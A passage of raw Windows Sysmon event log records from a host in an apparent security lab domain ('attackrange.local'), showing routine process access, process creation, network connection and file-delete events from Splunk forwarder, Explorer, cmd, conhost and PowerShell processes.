13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.095{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.080{B81B27B7-A1D4-6140-A556-04000000C801}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:55.752{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50634-false10.0.1.12-8000- 354300x800000000000000036498295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:54.938{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50633-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=147BCAE65E03F4B8F439AE52DB51644D,SHA256=31FF16BE57A920CC0F9D8EBF6AFFA510C09C5C5E0BC3E869116BC807CBF71E41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8DA91D6C86124874F723211835DD855,SHA256=CF1BA510F84C136DA1AD0E27E8A9657E99CDFF9F2344227D44E0EE381AB15E56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:25.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA1D351930A3BCAE98DEDF5A21EA0E98,SHA256=2F87189E9D229A95BB38E85812510766CA40D8BBB76552763B523B82D9DF748E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:26.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A62985C28576596933985AB9289832,SHA256=4CE2E7671FBAD35EAB0070F30B70474AA39201BF52C9339CBEE3E4E50C8CF331,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C670425801FC92EEEE3510567EC9CA9,SHA256=44656E28BA5766884804429EBC353C175A7FC8A8FAD2F1033710CAB06F339C54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15d19|C:\Windows\System32\SHELL32.dll+b1b50|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4C4A-02000000C801}2372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}4564ATTACKRANGE\REED_SCHMIDTC:\Windows\Explorer.EXEC:\Users\reed_schmidt\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b2af0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+981b0|C:\Windows\System32\SHELL32.dll+b2aac|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:27.047{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-E69F-612F-4D4A-02000000C801}6228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:28.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32ED9101F3C4F0575605FE20338EB44A,SHA256=D76CBE3E51315EB65A2D89F5EF4C0DD642A24F5A378C6AB15BAF63CDC5ADD6AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:28.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DAA7AE6A59832F44AFD572C4B4777457,SHA256=6B15C6C656550B3F21F78000D671CD73DBCE8F1397FA4D2A77914FDBCD56E78D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b3175|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644696C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7c948|C:\Windows\System32\TwinUI.dll+75f2d|C:\Windows\System32\TwinUI.dll+75b03|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b308e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644688C:\Windows\Explorer.EXE{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b3057|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd5f|C:\Windows\System32\windows.storage.dll+13aaeb|C:\Windows\System32\windows.storage.dll+13900f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13af|C:\Windows\System32\SHELL32.dll+b2af0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+981b0|C:\Windows\System32\SHELL32.dll+b2aac|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:58.952{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50635-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE18A6884AD15920AF3871CE4AC569DB,SHA256=ADC3D4DE9F72439930658F0689E1514F89F3A0D1D3874A2846768DB0AE581973,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:30.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA051C0E2B1860F59DE0DB58940318F,SHA256=C651BE8913922B05748F5B8D3AE107F4DBE9B9AE2841FA93E12BCDB6C209467F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:01.765{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50636-false10.0.1.12-8000- 23542300x800000000000000036498321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:31.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D450FD53EAB02F4815CD319F67FE985,SHA256=C75AA64D564D0A0819729A112CBEC49FEC8F02278EFC124ED9A2D2325B455909,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:31.060{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\aborted-session-pingMD5=DF765D3D43969D20782733152ACD442E,SHA256=479B569C549225F2F14850645DC03864615BB6BBF066F208271210B68D301C37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:02.964{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50637-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.625{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.523{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE461AFBEAF90E3E40BA007BC00AAC2D,SHA256=D69634E2539527F412D79D6C1F93445B61D50EAD379D65B6D83C9FFDB64E0DDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 